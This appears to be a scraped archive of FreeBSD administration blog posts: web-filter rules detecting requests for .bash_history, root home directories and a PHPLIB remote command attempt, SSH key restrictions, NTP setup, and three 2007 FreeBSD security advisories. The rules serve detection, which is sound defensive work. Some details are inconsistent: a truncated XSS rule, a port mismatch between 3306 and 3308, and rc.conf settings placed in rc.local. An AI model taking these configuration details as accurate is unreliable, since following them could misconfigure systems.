# WEB-MISC ///cgi-bin access
SecFilterSelective THE_REQUEST “///cgi-bin”

# WEB-MISC /cgi-bin/// access
SecFilterSelective THE_REQUEST “/cgi-bin///”

# WEB-MISC /~root access
SecFilterSelective THE_REQUEST “/~root”

# WEB-MISC /~ftp access
SecFilterSelective THE_REQUEST “/~ftp”

# WEB-MISC htgrep attempt
SecFilterSelective THE_REQUEST “/htgrep” chain
SecFilter “hdr=/”

# WEB-MISC htgrep access
SecFilterSelective THE_REQUEST “/htgrep” log,pass

# WEB-MISC .history access
SecFilterSelective THE_REQUEST “/\.history”

# WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST “/\.bash_history”

# WEB-MISC /~nobody access
SecFilterSelective THE_REQUEST “/~nobody”

# WEB-PHP PHP-Wiki cross site scripting attempt
SecFilterSelective THE_REQUEST ”

# WEB-PHP strings overflow
SecFilterSelective THE_REQUEST “\?STRENGUR”

# WEB-PHP PHPLIB remote command attempt
SecFilter “_PHPLIB\[libdir\]”

This sounds strange, what? Ok, let me tell you for what you would need that…I have a user which works with my MySQL-database by Windows-ODBC. The usual communication between client and server runs unencrypted. So I decided to tunnel the communication through an ssh-tunnel.

• Problem 1: User has shell-access and the user has the opportunity to log into my system and do things I don’t like.
  Solution 1: Don’t give him shell-access, but a program which runs forever and the user gets some output on his terminal to get no timeout.
• Problem 2: User could port-forward not only mysql-protocol but also SMTP, POP3… whatever. But I don’t want that.
  Restrict him to forward only special ports.

Create a file ~user/.ssh/authorized_keys like this

#  -> command=”…”
#     this command simply prints something to prevent a timeout while
#     the ssh-session is running. quoting-character like double quotes
#     in this command must be quoted with backslash
#  -> permitopen=”127.0.0.1:3306″
#     restrict the person using this key to only portforwarding
#     3306 to localhost
#  -> from=…
#     only allow connections from this host (not needed but sometimes useful)
# the rest is the public key
command=”/usr/bin/perl -e ‘$|=1;while (1) { print scalar localtime() . ”n”;sleep 30}’”,
permitopen=”127.0.0.1:3308″,
from=”box1.freebsd.org.in”
ssh-dss AAAAB3NzaC1kc3MAAACBAJ4vXg== some@comment_for_key

You can use the wall command to send a message to every user on a system. General syntax of wall command is as follows:
wall
Message
Message
…
….
..
When the message is complete, press Control-D.1) To display message “Disk failure system will be down for 30 minute” to all users use wall as follows:
# wall
Disk failure system will be down for 30 minute
--UNIX Admin
--MyCorp.com


When the message is complete, press Control-D (CTRL+D) to send message to all user.

2) To display message “Web server under DOS attack, come to IDC # 3″ to all WHEEL group member use wall command with –g option as follows:
# wall –g wheel
Web server under DOS attack, come to IDC # 3 to investigate matter further.
-- IT HEAD

When the message is complete, press Control-D (CTRL+D) to send message to all user.

You can use utility smbclient (part of samba server) to send a message to windows system from FreeBSD. This command lets you send messages to windows workstations, display browse lists, and connect to SMB shares. Genral syntax of to send a message is as follows:

smbclient -M < Message
Message
…
..
…
When the message is complete, press Control-D.

1) To send a message “Meeting cancelled” to windows system called xp1

$ smbclient -M xp1 < Conference cancelled
See you at home in 2 hrs.
–Funtoosh
EOF

2) With –U you can specify the username.
$ smbclient -M xp1 -U Funtoosh < Conference cancelled
See you at home in 2 hrs.
EOF

Read man page of smbclient for more information.

This is especially useful for systems which have multiple users with access to the console. One user may lock his or her session while still allowing other users to use the system on other virtual consoles. If desired, the entire console may be locked and virtual console switching disabled. This is really a good idea to lock your workstation which is use to control other servers in your network environment. Generally, KDE and Gnome include a locking feature. The idea is very simple secure your terminal from unwanted people.

Shell variables to auto-logout
Almost all-modern shell support some sort of auto logout option. Under BASH you need to use TMOUT variable. You can setup TMOUT in seconds, bash terminates after waiting for that number of seconds if input does not arrive. For example if you setup TMOUT 60 seconds:

$ export TMOUT=60

So, if no input (command typed) arrived it will terminate shell with following message:
timed out waiting for input: auto-logout

You can add TMOUT to your shell configuration file ~/.bash_profile file.

However, I liked tcsh shell (the default shell under FreeBSD) autologout variable. Genral syntax is as follows:
$ set autologout = (VAL1 VAL2)

Where,
VAL1 : The number of minutes of inactivity before automatic logout
VAL2 : The number of minutes of inactivity before automatic locking will take place this is optional.
For example, you can set autologout as follows.

$ set autologout = (5 10)

You can add autologout to your shell configuration file ~/.cshrc OR ~/.tcshrc.

Using lock command under FreeBSD
The lock command requests a password from the user, reads it again for verification and then will normally not relinquish the terminal until the password is repeated.

$ lock

Key:
Again:
lock: /dev/ttyp0 on fbsd6.freebsd.org.in. timeout in 15 minutes.
time now is Tue May 30 20:46:14 IST 2007
Key:

FreeBSD use the Network Time Protocol (NTP) for synchronising the clocks of computer systems over packet-switched, variable-latency data networks. NTP uses UDP port 123. If you have one computer or single server then you can easily synchronization time with other NTP servers. All you need is ntp client called ntpdate. It is use to set the date and time via NTP servers.

Step # 1: Install NTP

# pkg_add -rv  ntp

OR

# cd /usr/ports/net/ntp
# make; make install

Step # 2: Pick appropriate NTP Servers
Visit public ntp timeserver list to pick up your NTP server.

Step # 2: Open UDP port 123 at firewall

If you are running FreeBSD ipfilter firewall then you need to open the UDP port 123. Just add following rule to your firewall script:

pass out quick on lnc0 proto udp from YOUR-SERVER to any port = 123
keep state

OR

pass out quick on lnc0 proto udp from YOUR-SERVER to
TIME-SERVER-IP port = 123 keep state

For example, my FreeBSD workstation IP is 192.168.1.16 and 61.246.176.131 is IP of NTP server then my rule is in ipf.conf file as follows:

pass out quick on lnc0 proto udp from 192.168.1.16
to 61.246.176.131 port = 123 keep state

Step # 4: Test clock Synchronization
Just run ntpdate command as follows to see you can set date and clock via NTP:
a) Set wrong date (Mon Dec 13 4:27 pm)

# date 0412131627

b) Now set correct date with ntp:

# ntpdate -v -b in.pool.ntp.org

13 Dec 16:27:50 ntpdate[997]: ntpdate 4.2.0-a Thu Nov 3 07:34:22 UTC 2005 (1)
25 Jan 12:35:47 ntpdate[997]: step time server 61.246.176.131 offset 35237275.965726 sec

c) You can verify that correct data is setup:

# date

Wed Jan 25 12:36:21 IST 2006

Step # 5 : Enable date and time/ clock Synchronization at boot time
You need to set ntpdate via /etc/rc.local file.

# vi /etc/rc.local

Append following line to it:
ntpdate_enable=”YES”
ntpdate_hosts=”asia.pool.ntp.org”

Save the file. Make sure you have correct ntpdate_hosts server entry.

FreeBSD-SA-07:04.file                                       Security Advisory
The FreeBSD Project

Topic:          Heap overflow in file(1)

Category:       contrib
Module:         file
Announced:      2007-05-23
Affects:        All FreeBSD releases.
Corrected:      2007-05-23 16:12:51 UTC (RELENG_6, 6.2-STABLE)
2007-05-23 16:13:07 UTC (RELENG_6_2, 6.2-RELEASE-p5)
2007-05-23 16:13:20 UTC (RELENG_6_1, 6.1-RELEASE-p17)
2007-05-23 16:12:10 UTC (RELENG_5, 5.5-STABLE)
2007-05-23 16:12:35 UTC (RELENG_5_5, 5.5-RELEASE-p13)
CVE Name:       CVE-2007-1536

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit .

I.   Background

The file(1) utility attempts to classify file system objects based on
filesystem, magic number and language tests.

The libmagic(3) library provides most of the functionality of file(1)
and may be used by other applications.

II.  Problem Description

When writing data into a buffer in the file_printf function, the length
of the unused portion of the buffer is not correctly tracked, resulting
in a buffer overflow when processing certain files.

III. Impact

An attacker who can cause file(1) to be run on a maliciously constructed
input can cause file(1) to crash.  It may be possible for such an attacker
to execute arbitrary code with the privileges of the user running file(1).

The above also applies to any other applications using the libmagic(3)
library.

IV.  Workaround

No workaround is available, but systems where file(1) and other
libmagic(3)-using applications are never run on untrusted input are not
vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the
RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the
correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 5.5, 6.1,
and 6.2 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 5.5]
# fetch http://security.FreeBSD.org/patches/SA-07:04/file5.patch
# fetch http://security.FreeBSD.org/patches/SA-07:04/file5.patch.asc

[FreeBSD 6.1 and 6.2]
# fetch http://security.FreeBSD.org/patches/SA-07:04/file6.patch
# fetch http://security.FreeBSD.org/patches/SA-07:04/file6.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/libmagic
# make obj && make depend && make && make install

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch                                                           Revision
Path
- -------------------------------------------------------------------------
RELENG_5
src/contrib/file/file.h                                     1.1.1.7.2.1
src/contrib/file/funcs.c                                    1.1.1.1.2.1
src/contrib/file/magic.c                                    1.1.1.1.2.1
RELENG_5_5
src/UPDATING                                            1.342.2.35.2.13
src/sys/conf/newvers.sh                                  1.62.2.21.2.15
src/contrib/file/file.h                                     1.1.1.7.8.1
src/contrib/file/funcs.c                                    1.1.1.1.8.1
src/contrib/file/magic.c                                    1.1.1.1.8.1
RELENG_6
src/contrib/file/file.h                                     1.1.1.8.2.1
src/contrib/file/funcs.c                                    1.1.1.2.2.1
src/contrib/file/magic.c                                    1.1.1.2.2.1
RELENG_6_2
src/UPDATING                                             1.416.2.29.2.8
src/sys/conf/newvers.sh                                   1.69.2.13.2.8
src/contrib/file/file.h                                     1.1.1.8.8.1
src/contrib/file/funcs.c                                    1.1.1.2.8.1
src/contrib/file/magic.c                                    1.1.1.2.8.1
RELENG_6_1
src/UPDATING                                            1.416.2.22.2.19
src/sys/conf/newvers.sh                                  1.69.2.11.2.19
src/contrib/file/file.h                                     1.1.1.8.6.1
src/contrib/file/funcs.c                                    1.1.1.2.6.1
src/contrib/file/magic.c                                    1.1.1.2.6.1
- -------------------------------------------------------------------------

VII. References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1536

The latest revision of this advisory is available at
http://security.FreeBSD.org/advisories/FreeBSD-SA-07:04.file.asc

Source: FreeBSD.org

FreeBSD-SA-07:03.ipv6                                       Security Advisory
The FreeBSD Project

Topic:          IPv6 Routing Header 0 is dangerous

Category:       core
Module:         ipv6
Announced:      2007-04-26
Credits:        Philippe Biondi, Arnaud Ebalard, Jun-ichiro itojun Hagino
Affects:        All FreeBSD releases.
Corrected:      2007-04-24 11:42:42 UTC (RELENG_6, 6.2-STABLE)
2007-04-26 23:42:23 UTC (RELENG_6_2, 6.2-RELEASE-p4)
2007-04-26 23:41:59 UTC (RELENG_6_1, 6.1-RELEASE-p16)
2007-04-24 11:44:23 UTC (RELENG_5, 5.5-STABLE)
2007-04-26 23:41:27 UTC (RELENG_5_5, 5.5-RELEASE-p12)
CVE Name:       CVE-2007-2242

I.   Background

IPv6 provides a routing header option which allows a packet sender to
indicate how the packet should be routed, overriding the routing knowledge
present in a network.  This functionality is roughly equivalent to the
"source routing" option in IPv4.  All nodes in an IPv6 network -- both
routers and hosts -- are required by RFC 2460 to process such headers.

II.  Problem Description

There is no mechanism for preventing IPv6 routing headers from being used
to route packets over the same link(s) many times.

III. Impact

An attacker can "amplify" a denial of service attack against a link between
two vulnerable hosts; that is, by sending a small volume of traffic the
attacker can consume a much larger amount of bandwidth between the two
vulnerable hosts.

An attacker can use vulnerable hosts to "concentrate" a denial of service
attack against a victim host or network; that is, a set of packets sent
over a period of 30 seconds or more could be constructed such that they
all arrive at the victim within a period of 1 second or less.

Other attacks may also be possible.

IV.  Workaround

No workaround is available.

V.   Solution

NOTE WELL: The solution described below causes IPv6 type 0 routing headers
to be ignored.  Support for IPv6 type 0 routing headers can be re-enabled
if required by setting the newly added net.inet6.ip6.rthdr0_allowed sysctl
to a non-zero value.

Perform one of the following:

1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the
RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the
correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 5.5, 6.1,
and 6.2 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-07:03/ipv6.patch
# fetch http://security.FreeBSD.org/patches/SA-07:03/ipv6.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
 and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch                                                           Revision
Path
- ————————————————————————-
RELENG_5
src/sys/netinet6/in6.h                                         1.35.2.5
src/sys/netinet6/in6_proto.c                                   1.29.2.5
src/sys/netinet6/route6.c                                      1.10.4.2
RELENG_5_5
src/UPDATING                                            1.342.2.35.2.12
src/sys/conf/newvers.sh                                  1.62.2.21.2.14
src/sys/netinet6/in6.h                                     1.35.2.3.2.1
src/sys/netinet6/in6_proto.c                               1.29.2.4.2.1
src/sys/netinet6/route6.c                                  1.10.4.1.4.1
RELENG_6
src/sys/netinet6/in6.h                                         1.36.2.8
src/sys/netinet6/in6_proto.c                                   1.32.2.6
src/sys/netinet6/route6.c                                      1.11.2.2
RELENG_6_2
src/UPDATING                                             1.416.2.29.2.7
src/sys/conf/newvers.sh                                   1.69.2.13.2.7
src/sys/netinet6/in6.h                                     1.36.2.7.2.1
src/sys/netinet6/in6_proto.c                               1.32.2.5.2.1
src/sys/netinet6/route6.c                                  1.11.2.1.4.1
RELENG_6_1
src/UPDATING                                            1.416.2.22.2.18
src/sys/conf/newvers.sh                                  1.69.2.11.2.18
src/sys/netinet6/in6.h                                     1.36.2.6.2.1
src/sys/netinet6/in6_proto.c                               1.32.2.4.2.1
src/sys/netinet6/route6.c                                  1.11.2.1.2.1
- ————————————————————————-

VII. References

http://www.secdev.org/conf/IPv6_RH_security-csw07.pdf

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2242

The latest revision of this advisory is available at
http://security.FreeBSD.org/advisories/FreeBSD-SA-07:03.ipv6.asc

Source: FreeBSD.org

FreeBSD-SA-07:02.bind                                       Security Advisory
The FreeBSD Project

Topic:          Multiple Denial of Service vulnerabilities in named(8)

Category:       contrib
Module:         bind
Announced:      2007-02-09
Affects:        FreeBSD 5.3 and later.
Corrected:      2007-02-07 00:42:09 UTC (RELENG_6, 6.2-STABLE)
2007-02-09 20:24:15 UTC (RELENG_6_2, 6.2-RELEASE-p1)
2007-02-09 20:23:29 UTC (RELENG_6_1, 6.1-RELEASE-p13)
2007-02-07 00:46:35 UTC (RELENG_5, 5.5-STABLE)
2007-02-09 20:22:44 UTC (RELENG_5_5, 5.5-RELEASE-p11)
CVE Name:       CVE-2007-0493, CVE-2007-0494

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit .

I.   Background

BIND 9 is an implementation of the Domain Name System (DNS) protocols.
The named(8) daemon is an Internet domain name server.  DNS Security
Extensions (DNSSEC) are additional protocol options that add
authentication and integrity to the DNS protocols.

II.  Problem Description

A type * (ANY) query response containing multiple RRsets can trigger an
assertion failure.

Certain recursive queries can cause the nameserver to crash by using memory
which has already been freed.

III. Impact

A remote attacker sending a type * (ANY) query to an authoritative DNS
server for a DNSSEC signed zone can cause the named(8) daemon to exit,
resulting in a Denial of Service.

A remote attacker sending recursive queries can cause the nameserver to
crash, resulting in a Denial of Service.

IV.  Workaround

There is no workaround available, but systems which are not authoritative
servers for DNSSEC signed zones are not affected by the first issue; and
systems which do not permit untrusted users to perform recursive DNS
resolution are not affected by the second issue.  Note that the default
configuration for named(8) in FreeBSD allows local access only (which on
many systems is equivalent to refusing access to untrusted users).

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the
RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the
correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 5.5, 6.1,
and 6.2 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 5.5, FreeBSD 6.1]
# fetch http://security.FreeBSD.org/patches/SA-07:02/bind61.patch
# fetch http://security.FreeBSD.org/patches/SA-07:02/bind61.patch.asc

[FreeBSD 6.2]
# fetch http://security.FreeBSD.org/patches/SA-07:02/bind62.patch
# fetch http://security.FreeBSD.org/patches/SA-07:02/bind62.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/bind
# make obj && make depend && make && make install
# cd /usr/src/usr.sbin/named
# make obj && make depend && make && make install

c) Restart the named application:

# /etc/rc.d/named restart

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch                                                           Revision
Path
- -------------------------------------------------------------------------
RELENG_5
src/contrib/bind9/lib/dns/resolver.c                        1.1.1.1.2.8
src/contrib/bind9/lib/dns/validator.c                       1.1.1.1.2.5
src/contrib/bind9/lib/dns/include/dns/validator.h           1.1.1.1.2.4
RELENG_5_5
src/UPDATING                                            1.342.2.35.2.11
src/sys/conf/newvers.sh                                  1.62.2.21.2.13
src/contrib/bind9/lib/dns/resolver.c                    1.1.1.1.2.4.2.2
src/contrib/bind9/lib/dns/validator.c                   1.1.1.1.2.3.2.1
src/contrib/bind9/lib/dns/include/dns/validator.h       1.1.1.1.2.2.2.1
RELENG_6
src/contrib/bind9/lib/dns/resolver.c                        1.1.1.2.2.6
src/contrib/bind9/lib/dns/validator.c                       1.1.1.2.2.3
src/contrib/bind9/lib/dns/include/dns/validator.h           1.1.1.1.4.3
RELENG_6_2
src/UPDATING                                             1.416.2.29.2.4
src/sys/conf/newvers.sh                                   1.69.2.13.2.4
src/contrib/bind9/lib/dns/resolver.c                    1.1.1.2.2.4.2.2
src/contrib/bind9/lib/dns/validator.c                   1.1.1.2.2.1.4.2
src/contrib/bind9/lib/dns/include/dns/validator.h       1.1.1.1.4.1.4.2
RELENG_6_1
src/UPDATING                                            1.416.2.22.2.15
src/sys/conf/newvers.sh                                  1.69.2.11.2.15
src/contrib/bind9/lib/dns/resolver.c                    1.1.1.2.2.2.2.2
src/contrib/bind9/lib/dns/validator.c                   1.1.1.2.2.1.2.1
src/contrib/bind9/lib/dns/include/dns/validator.h       1.1.1.1.4.1.2.1
- -------------------------------------------------------------------------

VII. References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0493
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0494

The latest revision of this advisory is available at http://security.FreeBSD.org/advisories/FreeBSD-SA-07:02.bind.asc

Source: FreeBSD.org